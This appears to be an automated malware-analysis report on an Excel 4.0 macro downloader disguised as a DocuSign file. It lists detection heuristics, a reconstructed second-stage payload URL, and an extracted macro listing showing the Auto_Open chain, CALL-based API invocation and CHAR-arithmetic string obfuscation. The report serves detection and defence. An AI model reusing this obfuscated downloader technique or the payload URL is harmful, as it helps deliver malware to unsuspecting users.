MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is designed to execute a series of commands. These commands construct a URL and then use the RUN function, likely to download and execute a second-stage payload from the constructed URL: "https://esp.adnan.dev.hostingshouse.com/ds/151120.gif". The presence of ShellExecute API references further supports the execution of external commands.
Heuristics (7)
- ClamAV: Doc.Downloader.Docusign0521-9864805-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- URL reconstructed from XLM cell array (1 URL) (critical, OLE_XLM_CELL_ARRAY_URL): Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://esp.adnan.dev.hostingshouse.com/ds/151120.gif (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt (4d5531650e0faf8764ddd7b14e6947143c32308cbf699d36f8845764b3b4560a) | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 5603 bytes |
Preview script: first 1,000 lines of the extracted script

```text
' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d DocuSig!A50
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' 8 ,A94,RUN(B104),""
' 8 ,B104,RUN(A203),""
' 8 ,B200,"https://"&C201&D202&E203,""
' 8 ,A203,"CALL("K"& 8 !CC261,"C"& 8 !R134,"JCJ", 8 !BH172,0)",""
' 8 ,A204,"CALL("K"& 8 !CJ205,"C"& 8 !R168,"JCJ", 8 !BH172& 8 !BH187,0)",""
' 8 ,A205,"CALL("U"& 8 !CJ233,"U"& 8 !BO262,"JJCCJJ",0,B200, 8 !BH172& 8 !BH187& 8 !BH201,0,0)",""
' 8 ,A206,"CALL( 8 !X152, 8 !X165,"JJCCCCJ",0, 8 !BX227, 8 !BH172& 8 !BH187& 8 !BH201,,0,0)",""
' 8 ,A207,HALT(),""
' 8 ,EA233,"CONCATENATE(EA235,EA236,EA237,EA238,EA239,EA240,EA241,EA242,EA243,EA244,EA245,EA246,EA247,EA248,EA249)",""
' 8 ,EA234,[],""
' 8 ,EA235,[],""
' 8 ,EA236,[],""
' 8 ,EA237,[],""
' 8 ,EA238,[],""
' 8 ,EA239,[],""
' 8 ,EA240,[],""
' 8 ,EA241,[],""
' 8 ,EA242,[],""
' 8 ,EA243,[],""
' 8 ,EA244,[],""
' 8 ,EA245,[],""
' 8 ,EA246,[],""
' 8 ,EA247,[],""
' 8 ,EA248,[],""
' 8 ,EA249,[],""
' 8 ,EG251,CONCATENATE(EG252&EG253&EG254&EG255&EG256&EG257&EG258),""
' 8 ,EG252,CHAR(EH252+EI252+EJ252),""
' 8 ,EG253,CHAR(EH253+EI253+EJ253),""
' 8 ,EG254,CHAR(EH254+EI254+EJ254),""
' 8 ,EG255,CHAR(EH255+EI255+EJ255),""
' 8 ,EG256,CHAR(EH256-EI256-EJ256),""
' 8 ,EG257,CHAR(EH257-EI257-EJ257),""
' 8 ,EG258,CHAR(EH258-EI258-EJ258),""
' 8 ,EG264,CONCATENATE(EG265&EG266&EG267&EG268&EG269&EG270&EG271&EG272&EG273&EG274&EG275&EG276&EG277),""
' 8 ,EG265,CHAR(EH265+EI265+EJ265),""
' 8 ,EG266,CHAR(EH266+EI266+EJ266),""
' 8 ,EA267,"CONCATENATE(EA269,EA270,EA271,EA272,EA273,EA274,EA275,EA276,EA277,EA278,EA279,EA280,EA281,EA282,EA283)",""
' 8 ,EG267,CHAR(EH267+EI267+EJ267),""
' 8 ,EA268,CHAR(EB268+EC268+ED268),""
' 8 ,EG268,CHAR(EH268-EI268-EJ268),""
' 8 ,EA269,CHAR(EB269+EC269+ED269),""
' 8 ,EG269,CHAR(EH269-EI269-EJ269),""
' 8 ,EA270,CHAR(EB270+EC270+ED270),""
' 8 ,EG270,CHAR(EH270-EI270-EJ270),""
' 8 ,EA271,CHAR(EB271+EC271+ED271),""
' 8 ,EG271,CHAR(EH271-EI271-EJ271),""
' 8 ,EQ271,"CONCATENATE(EQ272,EQ273,EQ274,EQ275,EQ276,EQ277,EQ278,EQ279,EQ280)",""
' 8 ,EA272,CHAR(EB272-EC272-ED272),""
' 8 ,EG272,CHAR(EH272-EI272+EJ272),""
' 8 ,EQ272,CHAR(ER272+ES272+ET272),""
' 8 ,EA273,CHAR(EB273-EC273-ED273),""
' 8 ,EG273,CHAR(EH273-EI273+EJ273),""
' 8 ,EQ273,CHAR(ER273+ES273+ET273),""
' 8 ,EA274,CHAR(EB274-EC274-ED274),""
' 8 ,EG274,CHAR(EH274-EI274+EJ274),""
' 8 ,EQ274,CHAR(ER274+ES274+ET274),""
' 8 ,EA275,CHAR(EB275-EC275-ED275),""
' 8 ,EG275,CHAR(EH275+EI275-EJ275),""
' 8 ,EQ275,CHAR(ER275+ES275-ET275),""
' 8 ,EA276,CHAR(EB276+EC276-ED276),""
' 8 ,EG276,CHAR(EH276+EI276-EJ276),""
' 8 ,EQ276,CHAR(ER276+ES276-ET276),""
' 8 ,EA277,CHAR(EB277+EC277-ED277),""
' 8 ,EG277,CHAR(EH277+EI277-EJ277),""
' 8 ,EQ277,CHAR(ER277+ES277-ET277),""
' 8 ,EA278,CHAR(EB278+EC278-ED278),""
' 8 ,EQ278,CHAR(ER278-ES278+ET278),""
' 8 ,EA279,CHAR(EB279+EC279-ED279),""
' 8 ,EQ279,CHAR(ER279-ES279+ET279),""
' 8 ,EA280,CHAR(EB280-EC280+ED280),""
' 8 ,EQ280,CHAR(ER280-ES280+ET280),""
' 8 ,EA281,CHAR(EB281-EC281+ED281),""
' 8 ,EA282,CHAR(EB282-EC282+ED282),""
' 8 ,EA283,CHAR(EB283-EC283+ED283),""
' 8 ,EQ286,"CONCATENATE(EQ287,EQ288,EQ289,EQ290,EQ291,EQ292,EQ293)",""
' 8 ,EQ287,CHAR(ER287-ES287-ET287),""
' 8 ,EQ288,CHAR(ER288-ES288-ET288),""
' 8 ,EQ289,CHAR(ER289-ES289-ET289),""
' 8 ,EQ290,CHAR(ER290-ES290+ET290),""
' 8 ,EQ291,CHAR(ER291-ES291+ET291),""
' 8 ,EQ292,CHAR(ER292-ES292+ET292),""
' 8 ,EQ293,CHAR(ER293-ES293+ET293),""
' 8 ,EQ300,"CONCATENATE(EQ301,EQ302,EQ303,EQ304,EQ305,EQ306,EQ307,EQ308,EQ309,EQ310,EQ311,EQ312,EQ313)",""
' 8 ,EQ301,[],""
' 8 ,EQ302,[],""
' 8 ,EQ303,[],""
' 8 ,EQ304,[],""
' 8 ,EQ305,[],""
' 8 ,EQ306,[],""
' 8 ,EQ307,[],""
' 8 ,EQ308,[],""
' 8 ,EQ309,[],""
' 8 ,EQ310,[],""
' 8 ,EQ311,[],""
' 8 ,EQ312,[],""
' 8 ,EQ313,[],""
```